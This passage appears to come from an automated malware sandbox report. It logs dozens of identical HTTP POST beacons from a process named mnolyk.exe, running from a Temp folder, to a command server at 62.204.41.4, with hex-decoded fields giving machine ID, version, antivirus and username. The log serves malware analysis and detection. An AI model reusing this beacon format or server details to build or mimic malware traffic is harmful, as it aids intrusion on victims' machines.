                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.009787083 CET | 398 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            21 | 192.168.2.4 | 49716 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:29.564268112 CET | 210 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:29.629133940 CET | 210 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            210 | 192.168.2.4 | 49905 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:26.197218895 CET | 399 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.263432026 CET | 399 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            211 | 192.168.2.4 | 49906 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:26.442985058 CET | 400 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.507123947 CET | 400 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            212 | 192.168.2.4 | 49907 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:26.684813023 CET | 401 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.748305082 CET | 401 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            213 | 192.168.2.4 | 49908 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:26.928554058 CET | 402 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.993206024 CET | 402 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            214 | 192.168.2.4 | 49909 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:27.165241957 CET | 403 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:27.231302023 CET | 403 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            215 | 192.168.2.4 | 49910 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:27.414675951 CET | 404 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:27.479623079 CET | 404 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            216 | 192.168.2.4 | 49911 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:27.650449038 CET | 405 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:27.715866089 CET | 405 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            217 | 192.168.2.4 | 49912 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:27.898909092 CET | 406 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:27.962352991 CET | 406 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            218 | 192.168.2.4 | 49913 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:28.132055044 CET | 407 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:28.199865103 CET | 407 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            219 | 192.168.2.4 | 49914 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:28.388086081 CET | 408 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:28.453757048 CET | 408 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            22 | 192.168.2.4 | 49717 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:29.811372995 CET | 211 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:29.876492977 CET | 211 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            220 | 192.168.2.4 | 49915 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:28.630925894 CET | 409 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:28.694411993 CET | 409 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            221 | 192.168.2.4 | 49916 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:28.865859032 CET | 410 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:28.930334091 CET | 410 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            222 | 192.168.2.4 | 49917 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:29.103689909 CET | 411 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:29.167716026 CET | 411 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            223 | 192.168.2.4 | 49918 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:29.354199886 CET | 412 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:29.415900946 CET | 412 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            224 | 192.168.2.4 | 49919 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:29.584682941 CET | 413 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:29.649487019 CET | 413 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            225 | 192.168.2.4 | 49920 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:29.819519043 CET | 414 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:29.882147074 CET | 414 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            226 | 192.168.2.4 | 49921 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:30.054351091 CET | 415 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:30.119349003 CET | 415 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            227 | 192.168.2.4 | 49922 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:30.286333084 CET | 416 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:30.349036932 CET | 416 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
